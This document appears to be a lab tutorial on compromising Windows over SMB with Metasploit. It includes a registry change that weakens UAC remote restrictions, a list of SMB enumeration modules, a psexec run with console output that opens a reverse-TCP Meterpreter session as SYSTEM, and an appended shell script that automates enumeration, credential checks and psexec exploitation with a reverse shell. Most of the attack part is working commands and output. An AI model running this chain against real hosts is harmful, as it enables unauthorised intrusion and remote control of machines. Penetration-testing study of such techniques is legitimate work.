metasploit - smb

If the target is a standalone (workgroup) Windows machine and you authenticate as a local administrator account other than the built-in Administrator, UAC remote restrictions strip the administrative token from network logons, so psexec-style modules fail even with a correct password (the Rex::Proto::SMB error reference linked below helps decode the error Metasploit reports). For a lab target you can disable that filtering by setting LocalAccountTokenFilterPolicy to 1 and rebooting. This deliberately weakens the target, so only do it on a lab machine. Either import the following .reg file:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"LocalAccountTokenFilterPolicy"=dword:00000001

or open cmd or PowerShell as administrator and execute:

REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

The modules below enumerate a Windows SMB service (version, shares, users, named pipes) and validate credentials rather than exploit anything; they are what msfconsole lists under auxiliary/scanner/smb/:

msf > use auxiliary/scanner/smb/
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/psexec_loggedin_users
use auxiliary/scanner/smb/smb2
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumusers_domain
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_lookupsid
use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/smb_version

For the demo, exploit/windows/smb/psexec is used with the credentials validated above. It connects to the ADMIN$ share, uploads a randomly named service executable, starts it as a service so the Meterpreter stager runs as SYSTEM, and deletes the file afterwards. Note that the service installation is recorded by the Service Control Manager (System event log ID 7045) and antivirus commonly flags the dropped executable, so this is noisy on anything but a lab box.

msf exploit(psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                 192.168.1.101    yes       The target address
   RPORT                 445              yes       Set the SMB service port
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             WORKGROUP        no        The Windows domain to use for authentication
   SMBPass               password         no        The password for the specified username
   SMBUser               nfs              no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.108    yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > run

[*] Started reverse handler on 192.168.1.108:8080 
[*] Connecting to the server...
[*] Authenticating to 192.168.1.101:445|WORKGROUP as user 'nfs'...
[*] Uploading payload...
[*] Created \DMiyfhpP.exe...
[+] 192.168.1.101:445 - Service started successfully...
[*] Deleting \DMiyfhpP.exe...
[*] Sending stage (885806 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.108:8080 -> 192.168.1.101:1079) at 2015-08-15 04:46:06 +0000

meterpreter > sysinfo 
Computer        : SECLAB
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
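The enumeration sweep and the psexec run above are normally chained in one msfconsole resource script rather than typed module by module. The script below is an added example, not code from the original post or from Metasploit itself: it generates such a resource script (enumeration with the scanner modules listed earlier, then exploit/windows/smb/psexec with a reverse-TCP Meterpreter handler) and runs it with msfconsole -r if msfconsole is installed. The addresses, port, username and password are assumed lab placeholders mirroring the output above; it sets RHOSTS, the option name current Metasploit uses (the 2015 output shows RHOST), and the /tmp paths are arbitrary choices.

```shell
#!/bin/sh
# Added example, not from the original post: build a Metasploit resource
# script that enumerates SMB with the scanner modules, checks a credential
# with smb_login, then runs exploit/windows/smb/psexec with that credential.
# All hosts, ports and credentials are assumed lab placeholders.
set -eu

# Enumeration stage. setg makes RHOSTS and THREADS global so every module
# can be run without repeating them; spool logs everything the modules print.
# $1 target host or range, $2 user, $3 password, $4 domain (WORKGROUP or "." for local accounts)
enum_rc() {
  cat <<EOF
spool /tmp/smb_enum.log
setg RHOSTS $1
setg THREADS 8
use auxiliary/scanner/smb/smb_version
run
use auxiliary/scanner/smb/smb2
run
use auxiliary/scanner/smb/smb_enumshares
run
use auxiliary/scanner/smb/smb_enumusers
run
use auxiliary/scanner/smb/smb_lookupsid
run
use auxiliary/scanner/smb/pipe_auditor
run
use auxiliary/scanner/smb/smb_login
set SMBUser $2
set SMBPass $3
set SMBDomain $4
run
spool off
EOF
}

# Exploitation stage. RHOSTS is set explicitly to a single host so a global
# range from the enumeration stage is never reused against every host.
# "exploit -z" opens the session without dropping into it, so the script continues.
# $1 target host, $2 user, $3 password, $4 domain, $5 LHOST, $6 LPORT
psexec_rc() {
  cat <<EOF
use exploit/windows/smb/psexec
set RHOSTS $1
set SMBUser $2
set SMBPass $3
set SMBDomain $4
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $5
set LPORT $6
exploit -z
sessions -l
EOF
}

# Write both stages into one .rc file and print its path.
# $1 output path, $2 target, $3 user, $4 password, $5 domain, $6 LHOST, $7 LPORT
write_rc() {
  out=$1
  { enum_rc "$2" "$3" "$4" "$5"; psexec_rc "$2" "$3" "$4" "$5" "$6" "$7"; } > "$out"
  printf '%s\n' "$out"
}

main() {
  # Lab values assumed from the session above; adjust for your own range.
  rc=$(write_rc /tmp/smb_lab.rc 192.168.1.101 nfs password WORKGROUP 192.168.1.108 8080)
  if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$rc"
  else
    echo "msfconsole not found; resource script written to $rc"
  fi
}

main
```

Running the generated file with msfconsole -q -r /tmp/smb_lab.rc replays the whole workflow; the spooled /tmp/smb_enum.log keeps the enumeration results, and the psexec stage should be trimmed to hosts where smb_login actually reported a successful login.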

References

https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex::Proto::SMB-Error-mean%3F
